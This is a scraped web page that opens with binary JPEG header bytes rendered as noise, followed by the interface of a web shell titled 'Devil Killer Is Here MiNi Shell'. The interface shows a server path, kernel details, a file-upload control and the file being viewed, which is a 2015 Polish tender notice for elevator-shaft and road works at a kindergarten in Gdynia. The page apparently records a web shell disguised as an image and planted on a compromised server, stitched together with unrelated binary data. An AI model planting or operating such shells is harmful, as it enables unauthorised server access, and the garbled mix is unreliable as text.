JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150708/101661-N-2015.html

<p class="kh_header"><b>Gdynia: Dobudowa szybu windy wraz z remontem i przebudową pomieszczeń w obszarze dobudowanej  windy oraz z wewnętrznym układem drogowym w Przedszkolu Nr 19 w Gdyni przy ul. Harcerskiej 4 - etap budowy szybu windy, drogi dojazdowej i przebudowy pomieszczeń na parterze.</b><br>
<b>Numer ogłoszenia: 101661 - 2015; data zamieszczenia: 08.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Nr 19 , ul. Harcerska 4, 81-425 Gdynia, woj. pomorskie, tel. 58 622 12 42, faks 58 622 12 42.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.gdynia.pl/bip/BIPInfo/4804_.html</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dobudowa szybu windy wraz z remontem i przebudową pomieszczeń w obszarze dobudowanej  windy oraz z wewnętrznym układem drogowym w Przedszkolu Nr 19 w Gdyni przy ul. Harcerskiej 4 - etap budowy szybu windy, drogi dojazdowej i przebudowy pomieszczeń na parterze..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w niniejszym postępowaniu jest dobudowa szybu windy wraz z remontem i przebudową pomieszczeń w obszarze dobudowanej windy oraz z wewnętrznym układem drogowym w Przedszkolu Nr 19 w Gdyni przy ul. Harcerskiej 4 - etap budowy szybu windy, drogi dojazdowej i przebudowy pomieszczeń na parterze,  które obejmują swym zakresem w szczególności:
1.Dobudowę szybu windy na zewnątrz  budynku wraz z robotami towarzyszącymi
1)Roboty rozbiórkowe
a)rozebranie pokrycia dachowego z papy na betonie na zakład
b)rozebranie obróbek blacharskich murów ogniowych, okapów, kołnierzy
c)rozebranie  murków zsypów węgla i naświetla piwnicznego
d)rozebranie daszku w miejscu szybu windy
e)rozebranie ław fundamentów pod murkami zsypu
f)rozebranie  czapek betonowych attyki
g)wykucie z muru podokienników betonowych  i stalowych
h)wykucie z muru ościeżnic okiennych 
i)rozebranie ścianki z pustaków typu Alfa pod oknami
j)wykonanie nawiewu typu  Z w piwnicy  w maszynowni i osadzenie kratek wentylacyjnych
k)wykonanie wentylacji szybu windy w nadszybiu  
l)skucie tynków na ścianach w piwnicy 
m)ręczną rozbiórka elementów konstrukcji betonowych nie zbrojonych
n)wywiezienie i utylizacja gruzu  

2)Roboty budowlane 
a) wykonanie wykopu pod fundamenty szybu windy
b) wykonanie płyty fundamentowej pod szyb windy
c) montaż i betonowanie ścian prostych zbrojonych w deskowaniu systemowym 
d) wykonanie żelbetowej płyty stropowej  i dachowej  szybu windy
e) izolacja grzybobójcza ścian piwnicy od wewnątrz 
f) wykonanie tynków wewnętrznych na ścianach piwnicy
g) wykonanie wykopu odkrywającego ściany piwnicy od zewnątrz( do izolacji pionowej)
h) izolacje przeciwwilgociowe, powłokowe,  pionowe ścian piwnicy od zewnątrz
i) izolacja pozioma przeciwwilgociowa z papy termozgrzewalnej 
j) wykonanie tynków wewnętrznych zwykłych na ścianach w piwnicy 
k) ocieplenie ścian fundamentowych zewnętrznych płytami styropianowymi
l) uzupełnienie ścian lub zamurowanie otworów w ścianach 
m) izolacje dachu przeciwwilgociowe powłokowe poziome na płycie stropodachu szybu windy
n) uzupełnienie tynków zewnętrznych zwykłych kat. III
o) izolacje cieplne i przeciwdźwiękowe z płyt styropianowych  na dachu szybu windy
p) pokrycie dachu papą termozgrzewalną 
q) wykonanie obróbek blacharskich z blachy powlekanej w kolorze wg. projektu 
r) montaż prefabrykowanych rynien dachowych półokrągłe z polichlorku winylu 
s) ocieplenie ścian styropianem grubości 12 cm EPS-100-036,  
t) szpachlowanie zbrojone jedną warstwą siatki z włókna szklanego
u) wykonanie tynku cienkowarstwowego systemowego 
v) obsadzenie kratek wentylacyjnych w ścianach 
w) malowanie farbą elewacyjną systemową zgodną z systemem docieplenia 
x) montaż drzwi zewnętrznych dwuskrzydłowych z kształtowników aluminiowych-termiczne systemu PI 50
y) remont drzwi zewnętrznych - wejście na zaplecze przy windzie
z) montaż drzwi wewnętrznych w piwnicy
aa)montaż oświetlacza piwnicznego wg opisu w projekcie

3)Roboty elektryczne 
a) montaż WLZ do maszynowni windy 
b) montaż nowej instalacji oświetlenia szybu windy i maszynowni windy
c) montaż instalacji oświetlenia awaryjnego w podpiwniczeniu
d) montaż instalacji gniazd wtynkowych w części podpiwniczenia
e) wykonanie badań pomiarowych 

2.Przebudowę i remont części pomieszczeń na parterze budynku - zakres Rys. A10-A   
1)Roboty rozbiórkowe
a) rozebranie ścianki działowej
b) rozebranie posadzek z wykładziny z tworzyw sztucznych 
c) rozebranie posadzek z płytek ceramicznych
d) rozebranie okładzin ścian z płytek ceramicznych
e) rozebranie posadzek cementowych, lastrykowych
f) rozebranie posadzek z deszczułek mocowanych na lepik 
g) wykucie z muru ościeżnic drewnianych o powierzchni do 2 m2
h) wywiezienie i utylizacja gruzu 

2)Roboty budowlane
a)montaż ścianki działowej z bloczków gazobetonowych grubości 12 cm 
b)wykonanie otworu na drzwi w murowanej ścianie wraz z nadprożem,
c)obsadzenie kratek wentylacyjnych w ścianach z cegieł
d)wykonanie tynków wewnętrznych zwykłych  
e)uzupełnienie posadzki cementowej z zatarciem na gładko
f)izolacje przeciwwilgociowe i przeciwwodne pod posadzkowe
g)gruntowanie powierzchni posadzki
h)uszczelnienie pomieszczeń płynną folią uszczelniającą 
i)gruntowanie remontowanych posadzek
j)wykonanie posadzki z wykładzin z tworzyw sztucznych 
k)wykonanie posadzki z płytek z kamieni sztucznych układanej na klej
l)wykonanie posadzki z paneli podłogowych 
m)wykonanie okładziny ścian płytkami z kamieni sztucznych na zaprawie klejowej
n)wykonanie wewnętrznej gładzie gipsowej  na ścianach i sufitach
o)przygotowanie powierzchni pod malowanie 
p)dwukrotne malowanie farbami emulsyjnymi tynków wewnętrznych sufitów i ścian
q)montaż drzwi wewnętrznych
r)zamurowanie otworu  drzwiowego wraz z montażem okienka podawczego wymiarach 0,6x0,6 - pokój intendentki
s)montaż nawiewników okiennych  szt. 3  
t)wykonanie otworów wentylacyjnych w ścianach działowych
u)montaż kratek wentylacyjnych z obu stron otworu

3)Roboty rozbiórkowe instalacje sanitarne 
a)demontaż baterii wodociągowych
b)demontaż instalacji  wodociągowej rur ocynkowanych
c)demontaż podejść odpływowych wodociągowych
d)demontaż instalacji  kanalizacyjnej
e)demontaż podejść odpływowych z rur DN 110 mm
f)demontaż podejść odpływowych z rur DN 32-40 mm- demontaż ustępu z miską fajansową
g)demontaż umywalki
h)wywiezienie i utylizacja odpadów

4)Roboty montażowe - instalacja wodociągowa 
a)montaż rurociągi z tworzyw sztucznych 
b)montaż  baterii umywalkowych i zlewozmywakowych
c)montaż zaworów przelotowych podumywalkowych
d)próba szczelności instalacji wodociągowej 
e)płukanie instalacji wodociągowej 
f)izolacja otulinami poliuretanowymi - instalacji  wody ciepłej i zimnej 

5)Roboty montażowe - instalacja kanalizacyjna 
a)montaż rurociągu  kanalizacyjnego
b)montaż zlewu  stalowego kpl.
c)montaż umywalki pojedyncze porcelanowej kpl.
d)montaż rurociągu z tworzyw sztucznych 

6)Roboty elektryczne 
a) demontaż istniejącej instalacji
b) montaż rozdzielni T1.WLZ
c) montaż nowej instalacji oświetlenia 
d)montaż instalacji gniazd wtyczkowych
e) wykonanie badań pomontażowych 

3.Remont dojścia i dojazdu do budynku wraz  z robotami towarzyszącymi.

1)Roboty rozbiórkowe
a)likwidacja wyrzutni powietrza -rozebranie elementów żelbetonowych - 2 szt.
b) rozebranie murów betonowych powyżej terenu
c) zamurowanie połączenia kanałów wentylacyjnych podziemnych
d) zasypanie wykopów po zlikwidowanych wyrzutniach powietrza
e) rozebranie murów bramy wjazdowej z kamienia  powyżej terenu
f) rozebranie wolnostojących słupów (filarów) z kamienia  powyżej terenu
g) rozebranie schodów na gruncie -wejście do budynku przy windzie (od zaplecza).
h) rozebranie ogrodzenia z siatki w ramach na słupkach .
i) rozebranie bramy wjazdowej 
j) mechaniczne rozebranie nawierzchni betonowej o grubości 20 cm 
k) rozebranie dojścia do posesji z płyt chodnikowych 
l) wycięcie dwóch drzew - Decyzja Wydziału Środowiska
m) wywiezienie i utylizacja  gruzu 

2)Roboty budowlane - droga dojazdowa  
a)mechaniczne wykonanie koryta  
b)mechaniczne profilowanie i zagęszczenie podłoża  
c)wykonanie rowków pod krawężniki i ławy krawężnikowe
d)wykonanie ławy betonowej zwykłej pod krawężnik
e) montaż krawężnika betonowego
f)wykonanie  podbudowy  z  kamienia podkładowego łamanego
g)wykonanie podsypki piaskowej z zagęszczeniem  
h)wykonanie nawierzchni  z kostki betonowej

3)Roboty budowlane - chodnik i wiata śmietnikowa 
a) mechaniczne wykonanie koryta  
b) mechaniczne profilowanie i zagęszczenie podłoża 
c) montaż obrzeży betonowych
d) wykonanie podbudowy  z  kamienia podkładowego łamanego
e) wykonanie podsypki  piaskowej  z  zagęszczeniem  
f) wykonanie nawierzchnia z  kostki betonowej
g) montaż balustrady na podjeździe do windy -wys. 1.1m
h) montaż wiaty śmietnikowej wg opisu w projekcie budowlanym
i) montaż odwodnienia liniowego wg opisu w projekcie budowlanym

4)Roboty remontowe - wjazd  od ulicy Harcerskiej
a) przestawienie krawężników betonowych 
b) remont cząstkowy nawierzchni z kostki betonowej 
c) malowanie linii segregacyjnych i krawędziowych ciągłych  

5)Roboty remontowe - ogrodzenie od ulicy Harcerskiej

a) przebudowa murku z kamienia twardego ciosanego na zaprawie cementowej
b)uzupełnienie słupa ogrodzenia z kamienia ciosanego twardego wraz z czapką i osadzeniem kotwy do bramy
c)dostawa i montaż bramy wjazdowej - wzór dopasować do istniejących przęseł ogrodzenia 
d)dostawa i montaż przęsła - wzór dostosować do istniejących przęseł ogrodzenia 
e) dostawa i montaż furtki wejściowej - wzór dostosować do istniejących przęseł ogrodzenia

4.Obsługę geodezyjną
- obsługa geologiczna i geodezyjna inwestycji 
5.Wykonanie dokumentacji powykonawczej.
6.Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja projektowa stanowiąca załącznik nr 9 do niniejszej SIWZ, rysunek A10-A stanowiący załącznik nr 10 do SIWZ, oraz specyfikacja techniczna wykonania i odbioru robót budowlanych stanowiąca załącznik nr 11 do niniejszej SIWZ.
7.W przypadku użycia w niniejszej dokumentacji określeń wskazujących na typ, znaki towarowe lub pochodzenie przedmiotu zamówienia należy odczytywać je wraz z wyrazami lub równoważne. Nazwy własne są przykładowe, określają klasę produktu i służą ustaleniu standardu - nie wskazują na konkretny wyrób lub konkretnego producenta. Wykonawca oferując przedmiot równoważny do opisanego w specyfikacji czy przedmiarach jest zobowiązany zachować równoważność w zakresie parametrów użytkowych, funkcjonalnych, gabarytowych i jakościowych, które muszą być na poziomie nie niższym od parametrów wskazanych przez Zamawiającego. Ciężar udowodnienia, że oferowane artykuły są równoważne w stosunku do wymagań określonych przez Zamawiającego spoczywa na składającym ofertę. 
8.Wykonawca zobowiązany jest wykonać pełny zakres robót, który jest konieczny z punktu widzenia dokumentacji, przepisów prawa, wiedzy technicznej i sztuki budowlanej, dla uzyskania końcowego efektu określonego przez przedmiot zamówienia, a więc wykonać zadanie bez względu na występujące trudności i nieprzewidziane okoliczności jakie mogą wystąpić w trakcie realizacji.
9.Wykonawcy ponoszą odpowiedzialność za zapoznanie się z należytą starannością z treścią dokumentacji przetargowej oraz za uzyskanie wiarygodnej informacji odnośnie warunków i zobowiązań, które w jakikolwiek sposób mogą wpłynąć na cenę oferty lub realizację robót.
10.Ponadto roboty budowlane należy wykonać w sposób zgodny z przepisami ustawa z dnia 7 lipca 1994 r Prawo Budowlane (t. j. Dz. U. z 2013r. poz. 1409, z późn. zm.), przepisami wykonawczymi do w/w ustawy, innymi obowiązującymi aktami prawa odnoszącymi się do przedmiotu zamówienia, aktualnymi polskimi normami i normami branżowymi oraz właściwymi przepisami bhp i ppoż.
11.Wszystkie stosowane materiały budowlane użyte do wykonania przedmiotu zamówienia powinny posiadać stosowne certyfikaty, aprobaty techniczne i atesty wydane przez upoważnioną instytucję krajową oraz zezwalające na ich stosowanie.
12.Wszystkie materiały budowlane muszą spełniać niezbędne wymagania zgodne z Polskimi Normami.
13.Roboty tymczasowe i towarzyszące winny być wliczone oraz skalkulowane łącznie z robotami podstawowymi.
14.Wykonawca zobowiązany jest do udzielenia okresu gwarancji nie krótszego niż 36 miesięcy, licząc od daty podpisania protokołu odbioru końcowego. Zamawiający wymaga aby okres rękojmi był równy okresowi gwarancji
15.Sprzęt budowlany powinien posiadać aktualne przeglądy i badania.
16.Elektronarzędzia powinny posiadać aktualne protokoły pomiarów ochronnych..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.41.00-1, 45.11.11.00-9, 45.11.12.00-8, 45.20.00.00-9, 45.23.32.50-6, 45.26.23.11-4, 45.26.23.10-7, 45.32.00.00-6, 45.42.11.14-6, 45.42.11.15-3, 45.43.12.00-9, 45.26.23.20-0, 45.43.11.00-8, 45.44.21.00-8, 45.45.00.00-6, 45.31.10.00-0, 45.31.23.10-3, 45.31.57.00-5, 45.31.60.00-5, 45.30.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca przystępujący do postępowania obowiązany jest do wniesienia wadium w wysokości 8.000,00 zł (słownie złotych: osiem tysięcy). Wadium należy wnieść przed upływem terminu składania ofert.
2.Wadium może być wniesione w jednej lub kilku następujących formach: w pieniądzu; poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, (z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym), gwarancjach bankowych; gwarancjach ubezpieczeniowych; poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.). 
3.Wadium wnoszone w pieniądzu należy przelać na rachunek: PKO BP 77 1440 1026 0000 0000 1361 5594 Wykonawca, wnoszący wadium w pieniądzu zobowiązany jest do wpłacenia go odpowiednio wcześniej, tak aby znalazło się ono na koncie Zamawiającego przed datą i godziną składania ofert.
4.Wadium wnoszone w formie niepieniężnej powinno być wystawione na Zamawiającego i dołączone do oferty.
5.Dokument poręczenia/gwarancyjny powinien przewidywać utratę wadium na rzecz Zamawiającego w przypadkach określonych w pkt 6 i 7 poniżej, oraz zawierać w swojej treści zobowiązanie do bezwarunkowej i nieodwołalnej zapłaty na pierwsze pisemne żądanie Zamawiającego pełnej kwoty wadium po spełnieniu się każdego warunku określonego w pkt 6 i 7 poniżej.
6.Wykonawca traci wadium na rzecz Zamawiającego, wraz z odsetkami, w przypadku, gdy wykonawca, którego oferta została wybrana:
1)odmówi podpisania umowy na warunkach określonych w ofercie;
2)nie wniesie zabezpieczenia należytego wykonania umowy;
3)zawarcie umowy będzie niemożliwe z przyczyn leżących po stronie wykonawcy.
7.Ponadto Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie do uzupełnienia dokumentów, o którym mowa w art. 26 ust. 3 ustawy Pzp, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Pzp, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy Pzp, co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.
8.Wadium musi zabezpieczać ofertę w całym okresie związania ofertą, który wynosi 30 dni od upływu terminu składania ofert.
9.Zamawiający zwróci wadium dla wykonawcy na zasadach określonych w art. 46 ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 ustawy PZP.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, wykonał co najmniej dwie roboty budowlane polegające na budowie lub przebudowie  obiektu kubaturowego z wyłączeniem hal magazynowych i przemysłowych, w tym minimum jedną obejmującą swoim zakresem budowę szybu windy, o wartości minimum 200 000 zł netto każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 ustawy PZP.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował w okresie realizacji zamówienia następującymi kluczowymi osobami:
a)osoba z uprawnieniami budowlanymi w specjalności konstrukcyjno - budowlanej,
b)osoba z uprawnieniami budowlanymi w specjalności instalacyjnej w zakresie sieci,  instalacji i urządzeń elektrycznych,
c)osoba z uprawnieniami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowo i kanalizacyjnych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę 300.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
